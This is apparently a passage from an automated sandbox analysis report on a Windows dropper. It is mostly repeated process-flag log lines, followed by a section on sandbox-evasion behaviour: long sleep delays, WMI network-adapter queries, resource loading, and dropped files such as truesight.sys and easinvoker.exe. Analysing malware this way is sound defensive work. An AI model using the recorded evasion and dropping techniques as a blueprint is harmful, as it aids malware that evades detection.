              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\Public\Libraries\srcngmlC.pifWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Users\Public\Libraries\srcngmlC.pifWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Users\Public\Libraries\srcngmlC.pifWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,5_2_004019F0
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,0_2_02A2245C
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFCode function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,6_2_029D245C
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 922337203685477
              Source: C:\Users\Public\Libraries\srcngmlC.pifWindow / User API: threadDelayed 876Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifWindow / User API: threadDelayed 8971Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifWindow / User API: threadDelayed 4408Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifWindow / User API: threadDelayed 2698Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifWindow / User API: threadDelayed 1840
              Source: C:\Users\Public\Libraries\srcngmlC.pifWindow / User API: threadDelayed 7964
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeDropped PE file which has not been started: C:\Users\Public\Libraries\truesight.sysJump to dropped file
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeDropped PE file which has not been started: C:\Users\Public\Libraries\easinvoker.exeJump to dropped file
              Source: C:\Users\Public\Libraries\srcngmlC.pifEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_5-55981
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeAPI coverage: 7.0 %
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFAPI coverage: 5.2 %
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004Thread sleep time: -27670116110564310s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004Thread sleep time: -100000s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1704Thread sleep count: 876 > 30Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004Thread sleep time: -99875s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1704Thread sleep count: 8971 > 30Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004Thread sleep time: -99765s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004Thread sleep time: -99656s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004Thread sleep time: -99546s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004Thread sleep time: -99437s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004Thread sleep time: -99328s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004Thread sleep time: -99218s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004Thread sleep time: -99109s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004Thread sleep time: -99000s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004Thread sleep time: -98890s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004Thread sleep time: -98781s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004Thread sleep time: -98671s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004Thread sleep time: -98562s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004Thread sleep time: -98453s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004Thread sleep time: -98343s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004Thread sleep time: -98234s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004Thread sleep time: -98125s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004Thread sleep time: -98015s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004Thread sleep time: -97906s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004Thread sleep time: -97797s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004Thread sleep time: -97672s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004Thread sleep time: -97562s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004Thread sleep time: -97453s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004Thread sleep time: -97343s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004Thread sleep time: -97233s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004Thread sleep time: -97125s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004Thread sleep time: -97015s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004Thread sleep time: -96906s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004Thread sleep time: -96796s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004Thread sleep time: -99969s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004Thread sleep time: -99860s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004Thread sleep time: -99750s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004Thread sleep time: -99641s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004Thread sleep time: -99516s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004Thread sleep time: -99391s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004Thread sleep time: -99282s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004Thread sleep time: -99157s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004Thread sleep time: -99032s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004Thread sleep time: -98922s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004Thread sleep time: -98812s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004Thread sleep time: -98703s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004Thread sleep time: -98594s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004Thread sleep time: -98485s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004Thread sleep time: -98360s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004Thread sleep time: -98235s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004Thread sleep time: -98110s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004Thread sleep time: -97985s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004Thread sleep time: -97860s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 2004Thread sleep time: -97735s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456Thread sleep time: -20291418481080494s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456Thread sleep time: -100000s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 3652Thread sleep count: 4408 > 30Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 3652Thread sleep count: 2698 > 30Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456Thread sleep time: -99887s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456Thread sleep time: -99778s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456Thread sleep time: -99667s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456Thread sleep time: -99547s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456Thread sleep time: -99436s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456Thread sleep time: -99326s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456Thread sleep time: -99214s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456Thread sleep time: -99102s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456Thread sleep time: -98990s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456Thread sleep time: -98862s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456Thread sleep time: -98735s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456Thread sleep time: -98622s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456Thread sleep time: -98510s >= -30000sJump to behavior
